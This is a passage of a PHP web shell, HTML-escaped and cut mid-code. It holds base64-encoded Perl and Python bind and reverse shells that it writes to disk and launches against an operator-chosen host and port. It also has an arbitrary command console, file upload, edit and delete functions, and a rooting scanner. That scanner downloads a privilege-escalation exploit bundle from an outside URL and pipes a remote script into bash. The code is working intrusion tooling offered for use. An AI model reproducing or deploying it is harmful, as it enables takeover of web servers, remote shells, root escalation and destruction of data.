			$bp = base64_decode(&quot;IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=&quot;);
			$brt = @fopen('bp.pl','w');
			fwrite($brt,$bp);
			$out = exe(&quot;perl bp.pl &quot;.$_7['port'].&quot; 1&gt;/dev/null 2&gt;&amp;1 &amp;&quot;);
			sleep(1);
			echo &quot;&lt;pre&gt;$out\n&quot;.exe(&quot;ps aux | grep bp.pl&quot;).&quot;&lt;/pre&gt;&quot;;
			unlink(&quot;bp.pl&quot;);
		}
		if($_7['bc'] == 'perl'){
			$bc = base64_decode(&quot;IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7&quot;);
			$plbc = @fopen('bc.pl','w');
			fwrite($plbc,$bc);
			$out = exe(&quot;perl bc.pl &quot;.$_7['server'].&quot; &quot;.$_7['port'].&quot; 1&gt;/dev/null 2&gt;&amp;1 &amp;&quot;);
			sleep(1);
			echo &quot;&lt;pre&gt;$out\n&quot;.exe(&quot;ps aux | grep bc.pl&quot;).&quot;&lt;/pre&gt;&quot;;
			unlink(&quot;bc.pl&quot;);
		}
		if($_7['bc'] == 'python'){
			$bc_py = base64_decode(&quot;IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=&quot;);
			$pbc_py = @fopen('bcpy.py','w');
			fwrite($pbc_py,$bc_py);
			$out_py = exe(&quot;python bcpy.py &quot;.$_7['server'].&quot; &quot;.$_7['port']);
			sleep(1);
			echo &quot;&lt;pre&gt;$out_py\n&quot;.exe(&quot;ps aux | grep bcpy.py&quot;).&quot;&lt;/pre&gt;&quot;;
			unlink(&quot;bcpy.py&quot;);
			}
			echo &quot;&lt;/div&gt;
			&lt;/div&gt;
		&lt;br/&gt;&quot;;
		}
		// console
		if($_7['id'] == 'cmd') {
		s();
		if(!empty($_POST['cmd'])) {
			$cmd = shell_exec($_POST['cmd'].' 2&gt;&amp;1');
		}
		echo &quot;
		&lt;div class='mb-3'&gt;
			&lt;form method='POST'&gt;
				&lt;div class='input-group mb-3'&gt;
					&lt;input class='form-control btn-sm' type='text' name='cmd' value='&quot;.htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8').&quot;' placeholder='whoami' $_r&gt;
					&lt;button class='btn btn-outline-light btn-sm' type='sumbit'&gt;&lt;i class='bi bi-arrow-return-right'&gt;&lt;/i&gt;&lt;/button&gt;
				&lt;/div&gt;
			&lt;/form&gt;&quot;;
			if($cmd):
			echo '
			&lt;div class=&quot;container-fluid language-javascript&quot;&gt;
				&lt;div class=&quot;shell mb-3&quot;&gt;
					&lt;pre style=&quot;font-size:10px;&quot;&gt;&lt;gr&gt;~&lt;/gr&gt;$&amp;nbsp;&lt;rd&gt;'.htmlspecialchars($_POST['cmd']).'&lt;/rd&gt;&lt;br&gt;&lt;code&gt;'.htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8').'&lt;/code&gt;&lt;/pre&gt;
				&lt;/div&gt;
			&lt;/div&gt;';
			elseif(!$cmd &amp;&amp; $_SERVER['REQUEST_METHOD'] == 'POST'):
			echo '
			&lt;div class=&quot;container-fluid language-javascript&quot;&gt;
				&lt;div class=&quot;shell mb-3&quot;&gt;
					&lt;pre style=&quot;font-size:10px;&quot;&gt;&lt;code&gt;No result&lt;/code&gt;&lt;/pre&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;';
		endif;
		}
		// mulltiple upload
		if($_7['id'] == 'upload'){
		s();
		if(isset($_7['upl'])){
			$result = count($_FILES['file']['name']);
			for($contents=0;$contents&lt;$result;$contents++){
				$namefile = $_FILES['file']['name'][$contents];
					$up = @copy($_FILES['file']['tmp_name'][$contents],&quot;$path/&quot;.$namefile);
				}
				if($result &lt; 2){
					if($up){
					echo &quot;&lt;strong&gt;Upload&lt;/strong&gt; $namefile ok! &quot;.ok().&quot;&lt;/div&gt;&quot;;
				}else{
				echo '&lt;strong&gt;Upload&lt;/strong&gt; fail! '.er().'&lt;/div&gt;';
				}
			}else{
			echo &quot;&lt;strong&gt;Upload&lt;/strong&gt; $result ok! &quot;.ok().&quot;&lt;/div&gt;&quot;;
			}
		}
		echo &quot;
		&lt;div class='card card-body text-dark input-group mb-3'&gt;
		&lt;u&gt;Multiple upload&lt;/u&gt;
			&lt;form method='POST' enctype='multipart/form-data'&gt;
				&lt;div class='input-group'&gt;
					&lt;input class='form-control form-control-sm' type='file' name='file[]' multiple='' $_r&gt;
					&lt;input class='btn btn-dark btn-sm' type='submit' name='upl' value='upload'&gt;
				&lt;/div&gt;
			&lt;/form&gt;
		&lt;/div&gt;&quot;;
			}
		}
		// scanner root #anon7
		if (isset($_GET['dir']) &amp;&amp; $_GET['id'] == &quot;scan_root&quot;) {
			ob_implicit_flush();ob_end_flush();s();
			echo &quot;
			&lt;div class='text-center'&gt;
				&lt;div class='btn-group mb-3'&gt;
					&lt;a class='btn btn-outline-light btn-sm' href='&quot;.$_SERVER['REQUEST_URI'].&quot;&amp;id_two=autoscan'&gt;&lt;i class='bi bi-bug'&gt;&lt;/i&gt; Auto scan&lt;/a&gt;
					&lt;a class='btn btn-outline-light btn-sm' href='&quot;.$_SERVER['REQUEST_URI'].&quot;&amp;id_two=scansd'&gt;&lt;i class='bi bi-search'&gt;&lt;/i&gt; Scan SUID&lt;/a&gt;
					&lt;a class='btn btn-outline-light btn-sm' href='&quot;.$_SERVER['REQUEST_URI'].&quot;&amp;id_two=esg'&gt;&lt;i class='bi bi-search'&gt;&lt;/i&gt; Exploit suggester&lt;/a&gt;
				&lt;/div&gt;
			&lt;/div&gt;&quot;;
			if (!function_exists(&quot;proc_open&quot;)) {
				echo &quot;&lt;center class='anu'&gt;Command is Disabled !&lt;/center&gt;&quot;;
			}
			if (!is_writable($path)) {
				echo &quot;&lt;center class='anu'&gt;Current Directory is Unwriteable !&lt;/center&gt;&quot;;
			}
			if (isset($_GET['id_two']) &amp;&amp; $_GET['id_two'] == &quot;autoscan&quot;) {
				if (!file_exists($path.&quot;/rooting/&quot;)) {
					mkdir($path.&quot;/rooting&quot;);
					exe_root(&quot;wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz&quot;, $path.&quot;/rooting&quot;);
					exe_root(&quot;tar -xf auto.tar.gz&quot;, $path.&quot;/rooting&quot;);
					if (!file_exists($path.&quot;/rooting/netfilter&quot;)) {
						die(&quot;&lt;center class='anu'&gt;Failed to Download Material !&lt;/center&gt;&quot;);
					}
				}
				echo '
				&lt;div class=&quot;container-fluid language-javascript&quot;&gt;
					&lt;div class=&quot;shell mb-3&quot;&gt;
						&lt;pre style=&quot;font-size:10px;&quot;&gt;&lt;code&gt;Netfilter : '.exe_root(&quot;timeout 10 ./rooting/netfilter&quot;, $path).'Ptrace : '.exe_root(&quot;echo id | timeout 10 ./rooting/ptrace&quot;, $path).'Sequoia : '.exe_root(&quot;timeout 10 ./rooting/sequoia&quot;, $path).'OverlayFS : '.exe_root(&quot;echo id | timeout 10 ./overlayfs&quot;, $path.&quot;/rooting&quot;).'Dirtypipe : '.exe_root(&quot;echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su&quot;, $path).'Sudo : '.exe_root(&quot;echo 12345 | timeout 10 sudoedit -s Y&quot;, $path).'Pwnkit : '.exe_root(&quot;echo id | timeout 10 ./pwnkit&quot;, $path.&quot;/rooting&quot;).'&lt;/code&gt;&lt;/pre&gt;
					&lt;/div&gt;
				&lt;/div&gt;';
			} elseif (isset($_GET['id_two']) &amp;&amp; $_GET['id_two'] == &quot;scansd&quot;) {
				echo '&lt;center class=&quot;anu&quot;&gt;[+] Scanning ...&lt;/center&gt;';
				echo '
				&lt;div class=&quot;container-fluid language-javascript&quot;&gt;
					&lt;div class=&quot;shell mb-3&quot;&gt;
						&lt;pre style=&quot;font-size:10px;&quot;&gt;&lt;code&gt;'.exe_root(&quot;find / -perm -u=s -type f 2&gt;/dev/null&quot;, $path).'&lt;/code&gt;&lt;/pre&gt;
					&lt;/div&gt;
				&lt;/div&gt;';
			} elseif (isset($_GET['id_two']) &amp;&amp; $_GET['id_two'] == &quot;esg&quot;) {
				echo '&lt;center class=&quot;anu&quot;&gt;[+] Loading ...&lt;/center&gt;';
				echo '
				&lt;div class=&quot;container-fluid language-javascript&quot;&gt;
					&lt;div class=&quot;shell mb-3&quot;&gt;
						&lt;pre style=&quot;font-size:10px;&quot;&gt;&lt;code&gt;'.exe_root(&quot;curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash&quot;, $path).'&lt;/code&gt;&lt;/pre&gt;
					&lt;/div&gt;
				&lt;/div&gt;';
			}
		}
		// openfile
		if(isset($_7['opn'])) {
			$file = $_7['opn'];
		}	
		// view
		if($_7['action'] == 'view') {
		s();
		echo &quot;
		&lt;div class='btn-group'&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=view&amp;opn=$file'&gt;&lt;i class='bi bi-eye-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=edit&amp;opn=$file'&gt;&lt;i class='bi bi-pencil-square'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=rename&amp;opn=$file'&gt;&lt;i class='bi bi-pencil-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=delete_file&amp;opn=$file'&gt;&lt;i class='bi bi-trash-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=download&amp;opn=$file'&gt;&lt;i class='bi bi-download'&gt;&lt;/i&gt;&lt;/a&gt;
		&lt;/div&gt;
		&lt;br&gt;
			&lt;i class='bi bi-file-earmark'&gt;&lt;/i&gt;:&amp;nbsp;&quot;.basename($file).&quot;
		&lt;/br&gt;
		&lt;div class='bg-dark'&gt;
			&lt;div class='container-fluid language-javascript'&gt;
				&lt;textarea rows='10' class='form-control' disabled=''&gt;&quot;.htmlspecialchars(file_get_contents($file)).&quot;&lt;/textarea&gt;
			&lt;/div&gt;
		&lt;/div&gt;&quot;;
		}
		// edit
		if(isset($_7['edit_file'])) {
		$updt = fopen(&quot;$file&quot;, &quot;w&quot;);
		$result = fwrite($updt, $_7['contents']);		
			if ($result) {
		echo '&lt;strong&gt;Edit file&lt;/strong&gt; ok! '.ok().'&lt;/div&gt;';
			}else{
		echo '&lt;strong&gt;Edit file&lt;/strong&gt; fail! '.er().'&lt;/div&gt;';
			}
		}
		if($_7['action'] == 'edit') {
		s();
		echo &quot;
		&lt;div class='btn-group'&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=view&amp;opn=$file'&gt;&lt;i class='bi bi-eye-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=edit&amp;opn=$file'&gt;&lt;i class='bi bi-pencil-square'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=rename&amp;opn=$file'&gt;&lt;i class='bi bi-pencil-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=delete_file&amp;opn=$file'&gt;&lt;i class='bi bi-trash-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=download&amp;opn=$file'&gt;&lt;i class='bi bi-download'&gt;&lt;/i&gt;&lt;/a&gt;
		&lt;/div&gt;
		&lt;br&gt;
			&lt;i class='bi bi-file-earmark'&gt;&lt;/i&gt;:&amp;nbsp;&quot;.basename($file).&quot;
		&lt;/br&gt;
		&lt;form method='POST'&gt;
			&lt;textarea class='form-control btn-sm' rows='10' name='contents' $_r&gt;&quot;.htmlspecialchars(file_get_contents($file)).&quot;&lt;/textarea&gt;
			&lt;div class='d-grid gap-2'&gt;
				&lt;button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'&gt;&lt;i class='bi bi-arrow-return-right'&gt;&lt;/i&gt;&lt;/button&gt;
			&lt;/div&gt;
		&lt;/form&gt;&quot;;
		}
		//rename folder
		if($_7['action'] == 'rename_folder') {
			if($_7['r_d']) {
				$r_d = rename($dir, &quot;&quot;.dirname($dir).&quot;/&quot;.htmlspecialchars($_7['r_d']).&quot;&quot;);
				if($r_d) {
		echo '&lt;strong&gt;Rename folder&lt;/strong&gt; ok! '.ok().'&lt;a class=&quot;btn-close&quot; href=&quot;?path='.dirname($dir).'&quot;&gt;&lt;/a&gt;&lt;/div&gt;';
				}else{
		echo '&lt;strong&gt;Rename folder&lt;/strong&gt; fail! '.er().'&lt;a class=&quot;btn-close&quot; href=&quot;?path='.dirname($dir).'&quot;&gt;&lt;/a&gt;&lt;/div&gt;';
				}
			}
		s();
		echo &quot;
		&lt;div class='btn-group'&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=rename_folder'&gt;&lt;i class='bi bi-pencil-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=delete_folder'&gt;&lt;i class='bi bi-trash-fill'&gt;&lt;/i&gt;&lt;/a&gt;
		&lt;/div&gt;
		&lt;br&gt;
			&lt;i class='bi bi-folder-fill'&gt;&lt;/i&gt;:&amp;nbsp;&quot;.basename($dir).&quot;
		&lt;/br&gt;
		&lt;form method='POST'&gt;
			&lt;div class='input-group'&gt;
				&lt;input class='form-control btn-sm' type='text' value='&quot;.basename($dir).&quot;' name='r_d' $_r&gt;
				&lt;button class='btn btn-outline-light btn-sm' type='submit'&gt;&lt;i class='bi bi-arrow-return-right'&gt;&lt;/i&gt;&lt;/button&gt;
			&lt;/div&gt;
		&lt;/form&gt;&quot;;
		}
		//rename file
		if(isset($_7['r_f'])) {
			$old = $file;
			$new = $_7['new_name'];
			rename($new, $old);
			if(file_exists($new)) {
		echo '&lt;div class=&quot;alert alert-warning alert-dismissible fade show my-3&quot; role=&quot;alert&quot;&gt;
			&lt;strong&gt;Rename file&lt;/strong&gt; name already in use! &lt;button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;alert&quot; aria-label=&quot;Close&quot;&gt;&lt;/button&gt;
		&lt;/div&gt;';
			}else{
		if(rename($old, $new)) {
		echo '&lt;strong&gt;Rename file&lt;/strong&gt; ok! '.ok().'&lt;/div&gt;';
			}else{
		echo '&lt;strong&gt;Rename file&lt;/strong&gt; fail! '.er().'&lt;/div&gt;';
				}
			}
		}
		if($_7['action'] == 'rename') {
		s();
		echo &quot;
		&lt;div class='btn-group'&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=view&amp;opn=$file'&gt;&lt;i class='bi bi-eye-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=edit&amp;opn=$file'&gt;&lt;i class='bi bi-pencil-square'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=rename&amp;opn=$file'&gt;&lt;i class='bi bi-pencil-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=delete_file&amp;opn=$file'&gt;&lt;i class='bi bi-trash-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=download&amp;opn=$file'&gt;&lt;i class='bi bi-download'&gt;&lt;/i&gt;&lt;/a&gt;
		&lt;/div&gt;
		&lt;br&gt;
			&lt;i class='bi bi-file-earmark'&gt;&lt;/i&gt;:&amp;nbsp;&quot;.basename($file).&quot;
		&lt;/br&gt;
		&lt;form method='POST'&gt;
			&lt;div class='input-group'&gt;
				&lt;input class='form-control btn-sm' type='text' name='new_name' value='&quot;.basename($file).&quot;' $_r&gt;
				&lt;button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'&gt;&lt;i class='bi bi-arrow-return-right'&gt;&lt;/i&gt;&lt;/button&gt;
			&lt;/div&gt;
		&lt;/form&gt;&quot;;
		}
		//delete file
		if ($_7['action'] == 'delete_file') {
		s();
		if ($_7['yeahx']) {
			$delete = unlink($file);
			if ($delete) {
		echo '&lt;strong&gt;Delete file&lt;/strong&gt; ok! '.ok().'&lt;/div&gt;';
			}else{
		echo '&lt;strong&gt;Delete file&lt;/strong&gt; fail! '.er().'&lt;/div&gt;';
			}
		}
		echo &quot;
		&lt;div class='btn-group mb-3'&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=view&amp;opn=$file'&gt;&lt;i class='bi bi-eye-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=edit&amp;opn=$file'&gt;&lt;i class='bi bi-pencil-square'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=rename&amp;opn=$file'&gt;&lt;i class='bi bi-pencil-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=delete_file&amp;opn=$file'&gt;&lt;i class='bi bi-trash-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=download&amp;opn=$file'&gt;&lt;i class='bi bi-download'&gt;&lt;/i&gt;&lt;/a&gt;
		&lt;/div&gt;
		&lt;div class='card card-body text-dark input-group mb-3'&gt;
			&lt;p&gt;Are you sure to delete : &quot;.basename($file).&quot; ?&lt;/p&gt;
			&lt;form method='POST'&gt;
				&lt;a class='btn btn-danger btn-block btn-sm' href='?dir=$dir'&gt;No&lt;/a&gt;
				&lt;input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'&gt;
			&lt;/form&gt;
		&lt;/div&gt;&quot;;
		}
		//delete folder
		if ($_7['action'] == 'delete_folder' ) {
		s();
		if ($_7['yeah']) {
			if(is_dir($dir)) {
			if(is_writable($dir)) {
				@rmdir($dir);
				@exe(&quot;rm -rf $dir&quot;);
				@exe(&quot;rmdir /s /q $dir&quot;);
		echo '&lt;strong&gt;Delete folder&lt;/strong&gt; ok! '.ok().'&lt;a class=&quot;btn-close&quot; href=&quot;?path='.dirname($dir).'&quot;&gt;&lt;/a&gt;&lt;/div&gt;';
				} else {
		echo '&lt;strong&gt;Delete folder&lt;/strong&gt; fail! '.er().'&lt;a class=&quot;btn-close&quot; href=&quot;?path='.dirname($dir).'&quot;&gt;&lt;/a&gt;&lt;/div&gt;';
				}
			}
		}
		echo &quot;
		&lt;div class='btn-group mb-3'&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=rename_folder'&gt;&lt;i class='bi bi-pencil-fill'&gt;&lt;/i&gt;&lt;/a&gt;
			&lt;a class='btn btn-outline-light btn-sm' href='?dir=$path&amp;action=delete_folder'&gt;&lt;i class='bi bi-trash-fill'&gt;&lt;/i&gt;&lt;/a&gt;
		&lt;/div&gt;
		&lt;div class='card card-body text-dark input-group mb-3'&gt;
			&lt;p&gt;Are you sure to delete : &quot;.basename($dir).&quot; ?&lt;/p&gt;
			&lt;form method='POST'&gt;
				&lt;a class='btn btn-danger btn-block btn-sm' href='?dir=&quot;.dirname($dir).&quot;'&gt;No&lt;/a&gt;
				&lt;input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'&gt;
			&lt;/form&gt;
		&lt;/div&gt;&quot;;
		}
		if(isset($_7['filenew'])) {
		s();
		if(isset($_7['bikin'])){
			$name = $_7['name_file'];
			$contents_file = $_7['contents_file'];
			foreach ($name as $name_file){
				$handle = @fopen(&quot;$name_file&quot;, &quot;w&quot;);
				if($contents_file){
					$create = @fwrite($handle, $contents_file);
				} else {
					$create = $handle;
				}
			}
			if($create){
				echo &quot;&lt;script&gt;window.location='?path=$path'&lt;/script&gt;&quot;;
			} else {
				echo '&lt;strong&gt;Create file&lt;/strong&gt; fail! '.er().'&lt;/div&gt;';
				}
			}
		echo &quot;
		&lt;div class='mb-3'&gt;
			&lt;form method='POST'&gt;
				&lt;i class='bi bi-file-earmark'&gt;&lt;/i&gt; Filename:
				&lt;input class='form-control form-control-sm' type='text' name='name_file[]' placeholder='filename' $_r&gt;
				&lt;i class='bi bi-file-earmark'&gt;&lt;/i&gt; Your script:
				&lt;textarea class='form-control form-control-sm' name='contents_file' rows='7' placeholder='your script' $_r&gt;&lt;/textarea&gt;
				&lt;div class='d-grid gap-2'&gt;
					&lt;input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='create'&gt;
				&lt;/div&gt;
			&lt;/form&gt;
		&lt;/div&gt;&quot;;
		}
		if(isset($_7['dirnew'])) {
		s();
		if(isset($_7['create'])){
			$name = $_7['name_dir'];
			foreach ($name as $name_dir){
				$folder = preg_replace(&quot;([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})&quot;, '', $name_dir);
				$fd = @mkdir ($folder);
			}
			if($fd){
				echo &quot;&lt;script&gt;window.location='?path=$path'&lt;/script&gt;&quot;;
			} else {
				echo '&lt;strong&gt;Create dir&lt;/strong&gt; fail! '.er().'&lt;/div&gt;';
				}
			}
		echo &quot;
		&lt;div class='mb-3'&gt;
			&lt;form method='POST'&gt;
				&lt;i class='bi bi-folder'&gt;&lt;/i&gt; Name directory:
				&lt;div class='input-group mb-3'&gt;
					&lt;input class='form-control form-control-sm' type='text' name='name_dir[]' placeholder='Dir name' $_r&gt;
					&lt;input class='btn btn-outline-light btn-sm' type='submit' name='create' value='create dir'&gt;
				&lt;/div&gt;
			&lt;/form&gt;
		&lt;/div&gt;&quot;;
		}
		echo '
		&lt;div class=&quot;table-responsive&quot;&gt;
		&lt;table class=&quot;table table-hover table-dark text-light&quot;&gt;
		&lt;thead&gt;
		&lt;tr&gt;
			&lt;td class=&quot;text-center&quot;&gt;name&lt;/td&gt;
				&lt;td class=&quot;text-center&quot;&gt;type&lt;/td&gt;
				&lt;td class=&quot;text-center&quot;&gt;last edit&lt;/td&gt;
				&lt;td class=&quot;text-center&quot;&gt;size&lt;/td&gt;
				&lt;td class=&quot;text-center&quot;&gt;owner&lt;gr&gt;/&lt;/gr&gt;group&lt;/td&gt;
				&lt;td class=&quot;text-center&quot;&gt;permsion&lt;/td&gt;
			&lt;td class=&quot;text-center&quot;&gt;action&lt;/td&gt;
		&lt;/tr&gt;
		&lt;/thead&gt;
		&lt;tbody class=&quot;text-nowrap&quot;&gt;
		&lt;tr&gt;
			&lt;td&gt;&lt;i class=&quot;bi bi-folder2-open&quot;&gt;&lt;/i&gt;&lt;a class=&quot;text-decoration-none text-secondary&quot; href=&quot;?path='.dirname($dir).'&quot;&gt;..&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td class=&quot;text-center&quot;&gt;
				&lt;div class=&quot;btn-group&quot;&gt;
					&lt;a class=&quot;btn btn-outline-light btn-sm&quot; href=&quot;?filenew&amp;path='.$dir.'&quot;&gt;&lt;i class=&quot;bi bi-file-earmark-plus-fill&quot;&gt;&lt;/i&gt;&lt;/a&gt;
					&lt;a class=&quot;btn btn-outline-light btn-sm&quot; href=&quot;?dirnew&amp;path='.$dir.'&quot;&gt;&lt;i class=&quot;bi bi-folder-plus&quot;&gt;&lt;/i&gt;&lt;/a&gt;
				&lt;/div&gt;
			&lt;/td&gt;
		&lt;/tr&gt;';		
		foreach($scand as $dir){
			$dt = date(&quot;Y-m-d G:i&quot;, filemtime(&quot;$path/$dir&quot;));
			if(strlen($dir) &gt; 25) {
				$_d = substr($dir, 0, 25).&quot;...&quot;;		
			}else{
				$_d = $dir;
			}
			if(function_exists('posix_getpwuid')) {
				$downer = @posix_getpwuid(fileowner(&quot;$path/$dir&quot;));
				$downer = $downer['name'];
			} else {
				$downer = fileowner(&quot;$path/$dir&quot;);
			}
			if(function_exists('posix_getgrgid')) {
				$dgrp = @posix_getgrgid(filegroup(&quot;$path/$dir&quot;));
				$dgrp = $dgrp['name'];
			} else {
				$dgrp = filegroup(&quot;$path/$dir&quot;);
			}
			if(!is_dir($path.'/'.$file)) continue;
				$size = filesize($path.'/'.$file)/1024;
				$size = round($size,3);
			if($size &gt;= 1024){
				$size = round($size/1024,2).' MB';
			}else{
				$size = $size.' KB';
			}
		if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
		echo &quot;
		&lt;tr&gt;
			&lt;td&gt;&lt;i class='bi bi-folder-fill'&gt;&lt;/i&gt;&lt;a class='text-decoration-none text-secondary' href='?dir=$path/$dir'&gt;$_d&lt;/a&gt;&lt;/td&gt;
			&lt;td class='text-center'&gt;dir&lt;/td&gt;
			&lt;td class='text-center'&gt;$dt&lt;/td&gt;
			&lt;td class='text-center'&gt;-&lt;/td&gt;
			&lt;td class='text-center'&gt;$downer&lt;gr&gt;/&lt;/gr&gt;$dgrp&lt;/td&gt;
			&lt;td class='text-center'&gt;&quot;;
				if(is_writable($path.'/'.$dir)) echo '&lt;gr&gt;';
					elseif(!is_readable($path.'/'.$dir)) echo '&lt;rd&gt;';
				echo p($path.'/'.$dir);
				if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;';
		echo &quot;
